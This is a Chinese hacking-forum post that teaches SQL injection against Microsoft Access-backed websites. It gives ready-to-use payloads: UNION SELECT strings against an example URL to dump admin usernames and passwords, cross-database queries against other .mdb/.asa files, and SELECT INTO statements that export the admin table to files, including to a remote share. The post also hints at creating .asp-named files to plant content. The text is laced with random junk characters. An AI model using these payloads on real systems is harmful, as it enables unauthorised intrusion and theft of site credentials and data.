找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2175|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------, [6 `3 y7 o( W& C. p- e+ g
union查询法& c; t1 K( ~- R6 H
首先要说的就是查询办法,一般的查询办法就是
; Y$ |0 \1 B! V; p+ m5 V3 N" _8 F, a& |% l. R
程序代码+ s" Y/ [/ w( W& P' D
and 1=(select count(*) from admin where left(id,1)='1')4 M/ R% ?" W( q- \% g
/ p1 d' S/ Z0 n" j- h3 F* u
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
% K' ^& M) D+ z% V' ?2 r2 T# i所以这个时候,union select横空出现.别以为只能在PHP里用哦...
2 Y2 w" W7 g) C# y9 ]$ }4 J& v譬如你有一个ACCESS点:
1 k' I% c. A& S& m% u- M程序代码
7 i2 z1 D$ U% b# ghttp://bbs.tian6.com/xiaoyang.asp?coder=1
* {) R, ]# v5 m1 [$ L( V  H; T4 V: S! s
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
( S; k7 I- Y" V$ {: ^) e  h然后我们直接来:
4 G* @+ R/ _9 k* F4 p$ G  F程序代码
. y0 E8 N! n: {1 k1 phttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]/ L* E, v+ f8 M& G' s) l8 c4 j3 J
  i2 f- C3 d) @: j& H
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
& v/ G! S3 O8 P6 D% ?, T8 G! ^. g3 F% O2 ^$ O1 X

# J+ B$ B, ^( R, F4 ~8 M
3 d$ ?6 Z% ]9 x5 `---------------------------------------------------------------
) I/ l" v9 H7 f: ~) e* \/ U7 fAccess跨库查询
; o7 ^# W% w6 n  T, K" F* l( @, w有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.7 a" X, i/ p/ F# ~% O( K
跨库的查询语句:
$ |1 I* ?; F& U0 @' U; m+ B子查询:5 {2 ?* k/ p- ~! x$ Z$ |
程序代码' w  t! o4 J( T5 p9 r3 j5 o
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0- V* h% \) N/ @- v2 C5 s+ w

0 {5 p6 Y" I; D% {union查询:
3 W# |+ U' k- d8 z' h- E程序代码6 S. n1 ]" [. t- j
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=18 m5 t/ K1 t: l( \, S" m

/ \/ n6 s1 K7 P跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
% A" w! D9 a4 k( z. V程序代码1 B5 x& w( w8 m9 Z. v
http://www.4ngel.net/article/46.htm 2 N1 s. O( R, |
http://hf110.com/Article/hack/rqsl/200502/66.html5 T' _' ~$ {/ R* }- k' M. E
/ k! {- ?$ T% o& k) h: ^$ {
---------------------------------------------------------------7 z4 r5 q( R9 k% R# s- r
Access注入,导出txt,htm,html
% @/ X6 w+ t5 R% r" F子查询语句:/ d- a" |$ Z; S! M& p* |
程序代码
& Z& M1 l, K6 `  RSelect * into [test.txt] in 'd:\web\' 'text;' from admin* w; U3 q. z4 G8 a& r
8 v! Q$ u$ M" d* I& l* I. V$ e
这样就把admin表的内容以test类型存进了d:\web里面.
  ^( X6 o: Z# Q/ OUNION查询:
& O: q0 f, C, e  M& f$ J& {程序代码
2 S+ k" l" Z2 Z8 y/ bunion select * into [admin.txt] in 'c:\' 'test;' from admin! w8 B; z  S) {* S
: R9 d; U* w3 k& A* J) X8 ]
而且这里也可以保存到本地来:
8 Z8 ?! ^9 j3 F' Z; t, M  m2 a程序代码
! C. s2 x# L! QSelect * into [test.txt] in '\\yourip\share' 'text;' from admin* l2 D$ ~* W4 l
6 m% r* `5 b( `0 O6 E& i. S
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
1 P4 P5 v; F, d9 E2 x% P( G- F6 x! f# c+ N) I) L6 [
程序代码& h+ A( S: X: [, `! C8 x0 R
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7- Q$ ^" o9 P" \) x$ H: m

) K) m2 m8 H+ i因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.4 L. L  t; ~4 X# y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表